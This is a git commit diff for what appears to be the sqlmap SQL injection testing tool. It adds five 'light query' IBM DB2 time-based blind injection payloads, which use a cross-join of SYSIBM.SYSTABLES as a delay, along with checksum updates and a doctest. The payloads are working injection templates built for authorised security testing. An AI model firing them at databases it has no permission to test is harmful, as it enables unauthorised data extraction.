feat(db2): add light time-based payloads

Giardi77 · Giardi77 · commit da7f75348a33 · 2026-06-05T12:33:38.000+02:00
diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt
@@ -82,7 +82,7 @@ d0b094a110bccec97d50037cc51445191561c0722ec53bf2cebe1521786e2451  data/xml/paylo
 53d0f29459f37248c320d5cb9960d432f46889696d27ae30cc3a3309fd6e026c  data/xml/payloads/error_based.xml
 b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609  data/xml/payloads/inline_query.xml
 0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689  data/xml/payloads/stacked_queries.xml
-997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1  data/xml/payloads/time_blind.xml
+286f3033555d126c29deb3dd8b23ea396f56f5c021468ad685327202e017bab5  data/xml/payloads/time_blind.xml
 40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089  data/xml/payloads/union_query.xml
 8b63fda09d5c5e43ad8e6db1db90e5b1017fbe02735f3858843fc52118e3a33a  data/xml/queries.xml
 0f5a9c84cb57809be8759f483c7d05f54847115e715521ac0ecf390c0aa68465  doc/AUTHORS
@@ -205,7 +205,7 @@ c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb  lib/parse/hand
 5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c  lib/parse/headers.py
 1ad9054cd8476a520d4e2c141085ae45d94519df5c66f25fac41fe7d552ab952  lib/parse/html.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/parse/__init__.py
-d2e771cdacef25ee3fdc0e0355b92e7cd1b68f5edc2756ffc19f75d183ba2c73  lib/parse/payloads.py
+3a7cb7774561a28949f8c6ef49e632b9ceb50bfd9d2946b6338f29968c2dfa38  lib/parse/payloads.py
 455ab0ec63e55cd56ce4a884b85bdc089223155008cab0f3696da5a33118f95b  lib/parse/sitemap.py
 1be3da334411657461421b8a26a0f2ff28e1af1e28f1e963c6c92768f9b0847c  lib/request/basicauthhandler.py
 132abf563aeaaf0108b7e3932cfcc9680c8f445e992de4ee71ceed1ddf60bc29  lib/request/basic.py
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
@@ -932,6 +932,84 @@
         </details>
     </test>
 
+    <test>
+        <title>IBM DB2 AND time-based blind (light query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR time-based blind (light query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND time-based blind (light query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR time-based blind (light query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
     <test>
         <title>IBM DB2 AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -1892,6 +1970,25 @@
         </details>
     </test>
 
+    <test>
+        <title>IBM DB2 time-based blind - Parameter replace (light query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>3</where>
+        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
     <test>
         <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
         <stype>5</stype>
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
@@ -106,6 +106,11 @@ def loadPayloads():
     >>> loadPayloads()
     >>> len(conf.tests) > 0
     True
+    >>> db2_light = [test for test in conf.tests if "IBM DB2" in test.get("title", "") and "light query" in test.get("title", "")]
+    >>> len(db2_light)
+    5
+    >>> all("T3" not in test.request.payload for test in db2_light)
+    True
     """
 
     for payloadFile in PAYLOAD_XML_FILES:
